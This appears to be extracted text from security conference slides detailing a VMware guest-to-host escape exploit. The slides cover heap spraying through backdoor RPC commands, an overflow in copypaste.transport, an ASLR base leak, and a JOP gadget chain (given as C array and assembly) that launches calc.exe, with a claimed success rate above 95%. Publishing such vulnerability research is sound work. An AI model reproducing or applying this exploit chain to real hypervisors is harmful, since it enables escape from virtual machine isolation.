00000000000000000000000000 00000000000000000000000000 00000000000000000000000000 00000000000000000000000000 00000000000000000000000000pos=0xB0 00000000000000000000000000 00000……………….000000000 00000000000000000000000000 00000000000000000000000000 00000000000000000000000000 00000000000000000000000000 00000000000000000000000000pos
  • 39. ⑤ Exploit Calculate Base The ASLR is not affect the lowest two bytes. DnD/CP object 0x40 0x9A xx xx xx xx 00 00 ????
  • 41. ⑤ Exploit Layout unity.window.contents.start unity.window.contents.chunk Dnd/CP object [X]fixed address jop jop jop jop … Global variable [X+0x08]window_id [X+0x0C]counter [X+0x10]window_width [X+0x14]window_height [X+0x28]contents_base Low 32 bits of JOP High 32 bits of JOP Low 32 bits of original address High 32 bits of original address Address of string calc.exe [JOP]
  • 42. ⑤ Exploit 1. Close the vmtoolsd process In order to reduce interference, search VMwareDragDetWndClass and send message WM_CLOSE. 2. Fill memory fragmentation; Loop 0x4A80 times Use vmx.capability.unified_loop instead of info-set for heap spray Size 0xA0+0x10 Keep the first two bytes unique.
  • 43. ⑤ Exploit 3. Generate three full bucket A suitable and precise heap spray can form three continuous memory buckets. But, in practical application. Info-set/get is unreliable and cause memory allocate multiple times and form memory hole. Using guest.upgrader_send_cmd_line_args, ToolsAutoInstallGetParams to replace info-set and info-get.
  • 44. ⑤ Exploit 3. Generate three full bucket For the first bucket, using tools.capability.guest_temp_directory to occupy position For the Second bucket, insert a readable string BeaconStr using “guest.upgrader_send_cmd_line_args” For the third bucket, set a DnD/CP version 3 object tools.capability.dnd_version 3 tools.capability.copypaste_version 3 vmx.capability.dnd_version vmx.capability.copypaste_version Call “tools.capability.guest_temp_directory”again, remove the first placeholder and use vulnerable transport block to reoccupy the first buckets.
  • 45. ⑤ Exploit 4. Find BeaconStr Call “copypaste.transport”to continuous overwrite the memory behind, 0xB0 bytes each time. Use ToolsAutoInstallGetParams to read the BeaconStr in the second buckets until found its contents was changed. 5. Find Dnd/CP version 3 object Call copypaste.transport to continuous overwrite the memory behind, 0xB0 bytes each time. Use ToolsAutoInstallGetParams to read the BeaconStr in the second buckets until found its contents was the desired address(ASLR will not change the lowest tow bytes of address). 6. Calculate base address and verify validate Calculate base address
  • 46. ⑤ Exploit 7. Layout Now, we got the base address, and then calculated the needed address. Call unity.window.contents.start and layout the low 32 bits of JOP address and original call address to global variable area. Call unity.window.contents.chunk and use its counter object to push the high 32s bit of JOP address, moreover, put the string address“C:windowssystem32calc.exe”to contents_base. Finally Layout : If the fixed address is X: window_id = X+8; //Low 32 bit of JOP address counter = X+0x0C; //High 32 bit of JOP address window_width = X+0x10; //Low 32 bit of original call address window_height = X+0x14; //High 32 bit of original call address contents_base = X + 0x28; // Address of string C:windowssystem32calc.exe
  • 47. ⑤ Exploit 8. Overwrite DnD/CP version 3 object Call copypaste.transport again and overwrite 8 bytes with address X. 9. JOP We can control R8 when call “copypaste.transport” unsigned long long jop[] = { j0, d0, 0, j1, 0, j2, 0, 0, j3, 0, 0, 0, j4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, j5, 0, 0, d1 }; Message_Send(channel, jop, sizeof(jop)); Start = JOP_base (in step 7): mov rcx, r8 call qword ptr [r8+60h] // to j4 j4: mov rdx, [r8+8] // d0 call qword ptr [r8] // to j0 j0: mov rax, rdx mov rdx, [rcx+170h] // d1 mov r8, rcx mov rcx, rax jmp qword ptr [r8+158h] // to j5 j5: mov [rdx+28h], rax jmp qword ptr [r8+18h] // to j1 j1: pop rdi jmp qword ptr [r8+28h] // to j2 j2: pop rdi jmp qword ptr [r8+40h] // to j3 j3: xxx
  • 48. ⑤ Exploit 10. Recovery Reverse JOP operation of previous step.
  • 52. ⑦ Conclusion  The success rate of our exploit exceeds 95%(96.7%);  No pwn no fun.